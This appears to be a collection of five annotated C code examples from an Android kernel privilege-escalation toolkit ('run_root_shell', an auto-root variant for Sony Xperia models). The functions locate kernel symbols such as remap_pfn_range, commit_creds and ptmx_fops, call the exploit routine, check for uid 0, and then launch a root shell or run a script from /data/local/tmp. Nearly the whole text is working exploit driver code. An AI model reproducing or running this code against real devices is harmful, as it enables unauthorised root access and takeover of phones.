示例#1
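/*
 * Derive the kernel physical offset from /proc/iomem and pass it to
 * set_kernel_phys_offset().
 *
 * The value used is the start address of the last "System RAM" range that
 * appears before the first entry whose name begins with "Kernel" (or before
 * end of file if no such entry exists).
 *
 * Returns true once an offset has been set. Returns false if /proc/iomem
 * cannot be opened or if no "System RAM" range was seen, so callers no
 * longer proceed with an offset of 0 that was never actually read.
 *
 * NOTE(review): kernels that print zeroed addresses in /proc/iomem for
 * unprivileged readers would make every range parse as 0 here; the result
 * is then meaningless even though parsing succeeds. Confirm on the target.
 */
static bool
detect_kernel_phys_parameters(void)
{
  FILE *fp;
  char line[BUFSIZ];
  char name[BUFSIZ];
  void *start_address, *end_address;
  void *system_ram_address = NULL;
  bool found_system_ram = false;

  fp = fopen("/proc/iomem", "r");
  if (!fp) {
    printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));
    return false;
  }

  /*
   * Read one line at a time. The previous fscanf() loop never checked the
   * conversion count: a line that did not match left the stream position
   * unchanged (endless loop) and compared a stale or uninitialized name.
   * It also let "%[^\n]" write without a bound. Here name has the same
   * size as line, so the name field can never exceed its buffer.
   */
  while (fgets(line, sizeof line, fp)) {
    if (sscanf(line, "%p-%p : %[^\n]", &start_address, &end_address, name) != 3) {
      continue; /* not a "start-end : name" record; skip it */
    }

    if (!strcmp(name, "System RAM")) {
      system_ram_address = start_address;
      found_system_ram = true;
      continue;
    }

    /* Stop at the first kernel entry; the last RAM range seen contains it. */
    if (!strncmp(name, "Kernel", 6)) {
      break;
    }
  }
  fclose(fp);

  if (!found_system_ram) {
    return false;
  }

  /*
   * NOTE(review): the cast to int truncates the address where pointers are
   * wider than int; kept as in the original because the parameter type of
   * set_kernel_phys_offset() is not visible here.
   */
  set_kernel_phys_offset((int)system_ram_address);

  return true;
}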
示例#2
/*
 * Entry point of this variant.
 *
 * Sequence: set a fixed kernel physical offset (0x200000), resolve the
 * remap_pfn_range address, resolve the credential helpers, call
 * run_exploit(), then treat getuid() == 0 as the only success signal and
 * start /system/bin/sh through system().
 *
 * Exits with EXIT_FAILURE after printing a message if any step fails.
 * argc and argv are not used.
 */
int
main(int argc, char **argv)
{
  const char *failure = NULL;

  /* Hard-coded offset: this variant does no runtime detection. */
  set_kernel_phys_offset(0x200000);
  remap_pfn_range = get_remap_pfn_range_address();

  if (!remap_pfn_range) {
    failure = "You need to manage to get remap_pfn_range addresses.\n";
  } else if (!setup_creds_functions()) {
    failure = "Failed to get prepare_kernel_cred and commit_creds addresses.\n";
  } else {
    run_exploit();

    /* The uid of this very process is what decides success. */
    if (getuid() != 0) {
      failure = "Failed to obtain root privilege.\n";
    }
  }

  if (failure) {
    printf("%s", failure);
    exit(EXIT_FAILURE);
  }

  /* The shell is a child of this process and runs with its current uid. */
  system("/system/bin/sh");

  exit(EXIT_SUCCESS);
}
示例#3
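/*
 * Entry point of this variant.
 *
 * Accepts an optional "-c <command>" pair on the command line. After the
 * same setup sequence as the other variants (fixed physical offset,
 * remap_pfn_range lookup, credential helper lookup, run_exploit(), and a
 * getuid() == 0 check) it either starts /system/bin/sh through system()
 * or replaces this process with "/system/bin/sh -c <command>".
 *
 * Exits with EXIT_FAILURE after printing a message if any step fails,
 * including a failed execl(), which the original reported as success.
 */
int
main(int argc, char **argv)
{
  char *command = NULL;
  int i;

  /* The last "-c <command>" pair wins; a trailing "-c" with no value is ignored. */
  for (i = 1; i < argc; i++) {
    if (!strcmp(argv[i], "-c") && i + 1 < argc) {
      command = argv[++i];
    }
  }

  /* Hard-coded offset: this variant does no runtime detection. */
  set_kernel_phys_offset(0x200000);
  remap_pfn_range = get_remap_pfn_range_address();
  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    exit(EXIT_FAILURE);
  }

  if (!setup_creds_functions()) {
    printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
    exit(EXIT_FAILURE);
  }

  run_exploit();

  /* The uid of this very process is what decides success. */
  if (getuid() != 0) {
    printf("Failed to obtain root privilege.\n");
    exit(EXIT_FAILURE);
  }

  if (command == NULL) {
    system("/system/bin/sh");
  } else {
    /*
     * The variadic terminator must be a null pointer of type char *; a bare
     * NULL may be passed as an int where NULL is defined as 0.
     */
    execl("/system/bin/sh", "/system/bin/sh", "-c", command, (char *)NULL);

    /* execl() returns only on failure; do not fall through to success. */
    printf("Failed to execute /system/bin/sh.\n");
    exit(EXIT_FAILURE);
  }

  exit(EXIT_SUCCESS);
}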
示例#4
/*
 * Entry point of the "auto-root" variant.
 *
 * Prints a banner and changelog, runs the same setup sequence as the other
 * variants (fixed physical offset, remap_pfn_range lookup, credential
 * helper lookup, run_exploit()), and if getuid() then returns 0 runs the
 * script /data/local/tmp/doomed2 through /system/bin/sh.
 *
 * Exits with EXIT_FAILURE after printing a message if any step fails.
 * argc and argv are not used.
 *
 * NOTE(review): the script is loaded from /data/local/tmp, a location that
 * is typically writable by the adb shell user, so whatever file is at that
 * path when this runs is executed with this process's uid. Confirm the
 * directory permissions on the target build.
 */
int
main(int argc, char **argv)
{
  static const char *const banner[] = {
    "run_root_shell v2.2\n",
    "Based on pref_event exploit\n\n",
    "Modified for auto-rooting by DooMLoRD\n",
    "Part of Easy Rooting Toolkit\n\n",
    "Changelog:\n",
    "v2.0: added support for Xperia S  (LT26)  {FW: 6.2.B.0.211}    [Cust: 1257-8080]\n",
    "v2.1: added support for Xperia Z  (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n",
    "v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284}   [Cust: 1272-1092]\n",
  };
  unsigned int line;

  /* None of the banner strings contains a conversion, so "%s" prints them verbatim. */
  for (line = 0; line < sizeof banner / sizeof banner[0]; line++) {
    printf("%s", banner[line]);
  }

  /* Hard-coded offset: this variant does no runtime detection. */
  set_kernel_phys_offset(0x200000);
  remap_pfn_range = get_remap_pfn_range_address();
  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    exit(EXIT_FAILURE);
  }

  if (!setup_creds_functions()) {
    printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
    exit(EXIT_FAILURE);
  }

  run_exploit();

  /* The uid of this very process is what decides success. */
  if (getuid() == 0) {
    printf("Launching auto-root script!\n");
    system("/system/bin/sh /data/local/tmp/doomed2");
    exit(EXIT_SUCCESS);
  }

  printf("Failed to obtain root privilege.\n");
  exit(EXIT_FAILURE);
}
示例#5
/*
 * Run `callback` through the mmap-based path.
 *
 * run_exploit_mmap() is tried first; when it returns non-zero, the result
 * it stored is returned unchanged. Otherwise three prerequisites are
 * resolved in order (the remap_pfn_range address, the ptmx_fops mmap
 * address and the kernel physical offset) before control is handed to
 * attempt_exploit().
 *
 * Returns false, after printing a message, when a prerequisite cannot be
 * resolved; otherwise returns whatever attempt_exploit() returns.
 */
bool
run_with_mmap(memory_callback_t callback)
{
  unsigned long int kernel_physical_offset;
  bool mmap_result;

  if (run_exploit_mmap(callback, &mmap_result)) {
    return mmap_result;
  }

  /* The setup_* helpers publish their findings through file-level variables. */
  setup_remap_pfn_range_address();
  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    return false;
  }

  setup_ptmx_fops_mmap_address();
  if (!ptmx_fops_mmap_address) {
    printf("You need to manage to get ptmx_fops addresses.\n");
    return false;
  }

  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (!kernel_physical_offset) {
    /* No per-device value is known: fall back to runtime detection. */
    if (!detect_kernel_phys_parameters()) {
      printf("You need to manage to get kernel_physical_offset addresses.\n");
      return false;
    }
  } else {
    /*
     * NOTE(review): 0x00008000 is presumably the offset of the kernel image
     * from the start of RAM on the supported devices; confirm against the
     * device table.
     */
    set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
  }

  return attempt_exploit(ptmx_fops_mmap_address,
                         (unsigned long int)&ptmx_mmap, 0,
                         run_callback_with_mmap, callback);
}